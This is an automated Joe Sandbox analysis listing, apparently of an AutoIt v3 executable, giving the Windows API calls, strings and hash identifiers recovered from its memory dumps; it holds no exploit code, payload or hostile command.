                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A72D75
                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A72D80
                                                                                              • GlobalLock.KERNEL32 ref: 00A72D89
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00A72D98
                                                                                              • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A72DA1
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A72DA8
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00A72DB3
                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00A72DC5
                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00A8FC38,00000000), ref: 00A72DDB
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00A72DEB
                                                                                              • CopyImage.USER32 ref: 00A72E11
                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00A72E30
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00A72E52
                                                                                              • ShowWindow.USER32(00000004), ref: 00A7303F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                                              • API String ID: 2211948467-2373415609
                                                                                              • Opcode ID: 900597370619a5dfa81b6dee72b1970128e5f7357c21eed478a9bd63e219ae19
                                                                                              • Instruction ID: 53ad7194d2c4d0de559134d0246124e4d22f6499b9a23a11b0662b4b65d4831e
                                                                                              • Opcode Fuzzy Hash: 900597370619a5dfa81b6dee72b1970128e5f7357c21eed478a9bd63e219ae19
                                                                                              • Instruction Fuzzy Hash: E4026D75600208AFDB14DFA4CC89EAE7BB9FB49724F048558F919AB2A1D774ED01CF60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00A8712F
                                                                                              • GetSysColorBrush.USER32 ref: 00A87160
                                                                                              • GetSysColor.USER32 ref: 00A8716C
                                                                                              • SetBkColor.GDI32(?,000000FF), ref: 00A87186
                                                                                              • SelectObject.GDI32(?,?), ref: 00A87195
                                                                                              • InflateRect.USER32 ref: 00A871C0
                                                                                              • GetSysColor.USER32 ref: 00A871C8
                                                                                              • CreateSolidBrush.GDI32(00000000), ref: 00A871CF
                                                                                              • FrameRect.USER32 ref: 00A871DE
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A871E5
                                                                                              • InflateRect.USER32 ref: 00A87230
                                                                                              • FillRect.USER32 ref: 00A87262
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A87284
                                                                                                • Part of subcall function 00A873E8: GetSysColor.USER32 ref: 00A87421
                                                                                                • Part of subcall function 00A873E8: SetTextColor.GDI32(?,?), ref: 00A87425
                                                                                                • Part of subcall function 00A873E8: GetSysColorBrush.USER32 ref: 00A8743B
                                                                                                • Part of subcall function 00A873E8: GetSysColor.USER32 ref: 00A87446
                                                                                                • Part of subcall function 00A873E8: GetSysColor.USER32 ref: 00A87463
                                                                                                • Part of subcall function 00A873E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A87471
                                                                                                • Part of subcall function 00A873E8: SelectObject.GDI32(?,00000000), ref: 00A87482
                                                                                                • Part of subcall function 00A873E8: SetBkColor.GDI32(?,00000000), ref: 00A8748B
                                                                                                • Part of subcall function 00A873E8: SelectObject.GDI32(?,?), ref: 00A87498
                                                                                                • Part of subcall function 00A873E8: InflateRect.USER32 ref: 00A874B7
                                                                                                • Part of subcall function 00A873E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A874CE
                                                                                                • Part of subcall function 00A873E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00A874DB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                              • String ID:
                                                                                              • API String ID: 4124339563-0
                                                                                              • Opcode ID: 82d626dc56da1d1969c4e364dc5f13fae9020c71a34b758a5bb68fa9cbc6c6bd
                                                                                              • Instruction ID: 9b3080f30486de7f0d66299c00897caf01016b6efc6cdddbf00f8a33b1d077d4
                                                                                              • Opcode Fuzzy Hash: 82d626dc56da1d1969c4e364dc5f13fae9020c71a34b758a5bb68fa9cbc6c6bd
                                                                                              • Instruction Fuzzy Hash: 68A16F72008301AFDB11EFA4DC48A5E7BA9FB49330F200B19F9A2961E1E775E9458F61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DestroyWindow.USER32 ref: 00A08E14
                                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00A46AC5
                                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00A46AFE
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A46F43
                                                                                                • Part of subcall function 00A08F62: InvalidateRect.USER32(?,00000000,00000001), ref: 00A08FC5
                                                                                              • SendMessageW.USER32(?,00001053), ref: 00A46F7F
                                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00A46F96
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?), ref: 00A46FAC
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?), ref: 00A46FB7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                              • String ID: 0
                                                                                              • API String ID: 2760611726-4108050209
                                                                                              • Opcode ID: cf88fbb6644de85dc25c4474193355720d2586a9357ecb5a2c86c7011d4d8ee2
                                                                                              • Instruction ID: c8bea4a063da297364dce8349cf894dd382a8c2e5342692ec5945877a3e8b521
                                                                                              • Opcode Fuzzy Hash: cf88fbb6644de85dc25c4474193355720d2586a9357ecb5a2c86c7011d4d8ee2
                                                                                              • Instruction Fuzzy Hash: 3812BD38600211DFDB25CF24D984BAAB7F5FB86310F544469F5858B6A2CB39EC52CF92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DestroyWindow.USER32 ref: 00A7273E
                                                                                              • SystemParametersInfoW.USER32 ref: 00A7286A
                                                                                              • SetRect.USER32 ref: 00A728A9
                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00A728B9
                                                                                              • CreateWindowExW.USER32 ref: 00A72900
                                                                                              • GetClientRect.USER32 ref: 00A7290C
                                                                                              • CreateWindowExW.USER32 ref: 00A72955
                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A72964
                                                                                              • GetStockObject.GDI32(00000011), ref: 00A72974
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00A72978
                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?), ref: 00A72988
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A72991
                                                                                              • DeleteDC.GDI32(00000000), ref: 00A7299A
                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00A729C6
                                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 00A729DD
                                                                                              • CreateWindowExW.USER32 ref: 00A72A1D
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A72A31
                                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00A72A42
                                                                                              • CreateWindowExW.USER32 ref: 00A72A77
                                                                                              • GetStockObject.GDI32(00000011), ref: 00A72A82
                                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A72A8D
                                                                                              • ShowWindow.USER32(00000004), ref: 00A72A97
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                              • API String ID: 2910397461-517079104
                                                                                              • Opcode ID: eb38ccc68c7b6ae5f41e82f5ae296159f6d2048d3c9ceea77f3f17d616aaf488
                                                                                              • Instruction ID: 1dc37b50d90acb6d8ebebac012d5d8036505874fb22b3b62ca9828a44bb68870
                                                                                              • Opcode Fuzzy Hash: eb38ccc68c7b6ae5f41e82f5ae296159f6d2048d3c9ceea77f3f17d616aaf488
                                                                                              • Instruction Fuzzy Hash: 15B15D71A00209AFEB14DFA8CD89FAE7BB9EB44714F008114FA15EB291D774ED41CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00A64AED
                                                                                              • GetDriveTypeW.KERNEL32(?,00A8CB68,?,\\.\,00A8CC08), ref: 00A64BCA
                                                                                              • SetErrorMode.KERNEL32(00000000,00A8CB68,?,\\.\,00A8CC08), ref: 00A64D36
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$DriveType
                                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                              • API String ID: 2907320926-4222207086
                                                                                              • Opcode ID: ef15d75a8ec1d851dfac8b68f2017c63ae95a7ba8c202b10c5dfb83f4883722c
                                                                                              • Instruction ID: 6ba167bbb3d8ca93320065abce0c3858b9b8d25ef2c3cf431e28f4cdd81eff5a
                                                                                              • Opcode Fuzzy Hash: ef15d75a8ec1d851dfac8b68f2017c63ae95a7ba8c202b10c5dfb83f4883722c
                                                                                              • Instruction Fuzzy Hash: 4961D370701509EBCB44DF28CA81AB97BB4FF4D744B248815F806AB792DB3AED41DB41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetSysColor.USER32 ref: 00A87421
                                                                                              • SetTextColor.GDI32(?,?), ref: 00A87425
                                                                                              • GetSysColorBrush.USER32 ref: 00A8743B
                                                                                              • GetSysColor.USER32 ref: 00A87446
                                                                                              • CreateSolidBrush.GDI32(?), ref: 00A8744B
                                                                                              • GetSysColor.USER32 ref: 00A87463
                                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A87471
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00A87482
                                                                                              • SetBkColor.GDI32(?,00000000), ref: 00A8748B
                                                                                              • SelectObject.GDI32(?,?), ref: 00A87498
                                                                                              • InflateRect.USER32 ref: 00A874B7
                                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A874CE
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00A874DB
                                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A8752A
                                                                                              • GetWindowTextW.USER32 ref: 00A87554
                                                                                              • InflateRect.USER32 ref: 00A87572
                                                                                              • DrawFocusRect.USER32 ref: 00A8757D
                                                                                              • GetSysColor.USER32 ref: 00A8758E
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00A87596
                                                                                              • DrawTextW.USER32(?,00A870F5,000000FF,?,00000000), ref: 00A875A8
                                                                                              • SelectObject.GDI32(?,?), ref: 00A875BF
                                                                                              • DeleteObject.GDI32(?), ref: 00A875CA
                                                                                              • SelectObject.GDI32(?,?), ref: 00A875D0
                                                                                              • DeleteObject.GDI32(?), ref: 00A875D5
                                                                                              • SetTextColor.GDI32(?,?), ref: 00A875DB
                                                                                              • SetBkColor.GDI32(?,?), ref: 00A875E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                              • String ID:
                                                                                              • API String ID: 1996641542-0
                                                                                              • Opcode ID: be65adf25daf4568c8c4248d4acdb69feab1c75473b7eeb26340a78c533592c5
                                                                                              • Instruction ID: 333fdd67f68a970f4671ca2602e909abf2c04c626e0f0f2ca94455fd9d7351be
                                                                                              • Opcode Fuzzy Hash: be65adf25daf4568c8c4248d4acdb69feab1c75473b7eeb26340a78c533592c5
                                                                                              • Instruction Fuzzy Hash: 95615D72900218AFDF15DFA4DC49EAE7FB9EB08330F214225F915AB2A1D7749941DFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCursorPos.USER32(?), ref: 00A81128
                                                                                              • GetDesktopWindow.USER32 ref: 00A8113D
                                                                                              • GetWindowRect.USER32(00000000), ref: 00A81144
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A81199
                                                                                              • DestroyWindow.USER32 ref: 00A811B9
                                                                                              • CreateWindowExW.USER32 ref: 00A811ED
                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A8120B
                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A8121D
                                                                                              • SendMessageW.USER32(00000000,00000421,?,?), ref: 00A81232
                                                                                              • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00A81245
                                                                                              • IsWindowVisible.USER32(00000000), ref: 00A812A1
                                                                                              • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00A812BC
                                                                                              • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00A812D0
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A812E8
                                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00A8130E
                                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00A81328
                                                                                              • CopyRect.USER32(?,?), ref: 00A8133F
                                                                                              • SendMessageW.USER32(00000000,00000412,00000000), ref: 00A813AA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                              • String ID: ($0$tooltips_class32
                                                                                              • API String ID: 698492251-4156429822
                                                                                              • Opcode ID: ca6c898074ffef7ec18f441adcae0ab1b22367646f355b2d562f8da5f1d6e16a
                                                                                              • Instruction ID: d1625d60ace83f5f31ada91b85ed278ce337dca741b5d45abd428f49f4dcc316
                                                                                              • Opcode Fuzzy Hash: ca6c898074ffef7ec18f441adcae0ab1b22367646f355b2d562f8da5f1d6e16a
                                                                                              • Instruction Fuzzy Hash: 55B17E71604341AFD714EF64C884B6ABBE8FF84354F00891CF9999B261D771E846CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00A802E5
                                                                                              • _wcslen.LIBCMT ref: 00A8031F
                                                                                              • _wcslen.LIBCMT ref: 00A80389
                                                                                              • _wcslen.LIBCMT ref: 00A803F1
                                                                                              • _wcslen.LIBCMT ref: 00A80475
                                                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00A804C5
                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A80504
                                                                                                • Part of subcall function 00A0F9F2: _wcslen.LIBCMT ref: 00A0F9FD
                                                                                                • Part of subcall function 00A5223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A52258
                                                                                                • Part of subcall function 00A5223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A5228A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                              • API String ID: 1103490817-719923060
                                                                                              • Opcode ID: a2d342fe68f267f482c35657a93e4b91c63e9e3f16093b1629a6c249f9ad77b9
                                                                                              • Instruction ID: a2695f3949a94091374ed1b9798d6b626b5dcc6e9ff381d2adbccefdbafd3a77
                                                                                              • Opcode Fuzzy Hash: a2d342fe68f267f482c35657a93e4b91c63e9e3f16093b1629a6c249f9ad77b9
                                                                                              • Instruction Fuzzy Hash: ACE1AB312082018FC764EF24C951D7EB7E6BFC9354B14896CF896AB2A2DB70ED49CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SystemParametersInfoW.USER32 ref: 00A08968
                                                                                              • GetSystemMetrics.USER32 ref: 00A08970
                                                                                              • SystemParametersInfoW.USER32 ref: 00A0899B
                                                                                              • GetSystemMetrics.USER32 ref: 00A089A3
                                                                                              • GetSystemMetrics.USER32 ref: 00A089C8
                                                                                              • SetRect.USER32 ref: 00A089E5
                                                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A089F5
                                                                                              • CreateWindowExW.USER32 ref: 00A08A28
                                                                                              • SetWindowLongW.USER32 ref: 00A08A3C
                                                                                              • GetClientRect.USER32 ref: 00A08A5A
                                                                                              • GetStockObject.GDI32(00000011), ref: 00A08A76
                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A08A81
                                                                                                • Part of subcall function 00A0912D: GetCursorPos.USER32(?), ref: 00A09141
                                                                                                • Part of subcall function 00A0912D: ScreenToClient.USER32(00000000,?), ref: 00A0915E
                                                                                                • Part of subcall function 00A0912D: GetAsyncKeyState.USER32 ref: 00A09183
                                                                                                • Part of subcall function 00A0912D: GetAsyncKeyState.USER32 ref: 00A0919D
                                                                                              • SetTimer.USER32(00000000,00000000,00000028,00A090FC), ref: 00A08AA8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                              • String ID: AutoIt v3 GUI
                                                                                              • API String ID: 1458621304-248962490
                                                                                              • Opcode ID: e926a64d66ab865b9b2483b19177755ca666482d91bfaffcb69642fbdc554e69
                                                                                              • Instruction ID: d8ec3135a82c124ac957d2c0e61471f28ee3193a4428b9843059456fbec42142
                                                                                              • Opcode Fuzzy Hash: e926a64d66ab865b9b2483b19177755ca666482d91bfaffcb69642fbdc554e69
                                                                                              • Instruction Fuzzy Hash: C1B16A75A002099FDF14DFA8DC45BAA3BB5BB49324F114229FA15A72D0DB34E841CF55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A510F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A51114
                                                                                                • Part of subcall function 00A510F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00A50B9B,?,?,?), ref: 00A51120
                                                                                                • Part of subcall function 00A510F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A50B9B,?,?,?), ref: 00A5112F
                                                                                                • Part of subcall function 00A510F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A50B9B,?,?,?), ref: 00A51136
                                                                                                • Part of subcall function 00A510F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A5114D
                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A50DF5
                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A50E29
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00A50E40
                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00A50E7A
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A50E96
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00A50EAD
                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00A50EB5
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00A50EBC
                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A50EDD
                                                                                              • CopySid.ADVAPI32(00000000), ref: 00A50EE4
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A50F13
                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A50F35
                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A50F47
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A50F6E
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00A50F75
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A50F7E
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00A50F85
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A50F8E
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00A50F95
                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00A50FA1
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00A50FA8
                                                                                                • Part of subcall function 00A51193: GetProcessHeap.KERNEL32(00000008,00A50BB1,?,00000000,?,00A50BB1,?), ref: 00A511A1
                                                                                                • Part of subcall function 00A51193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00A50BB1,?), ref: 00A511A8
                                                                                                • Part of subcall function 00A51193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00A50BB1,?), ref: 00A511B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
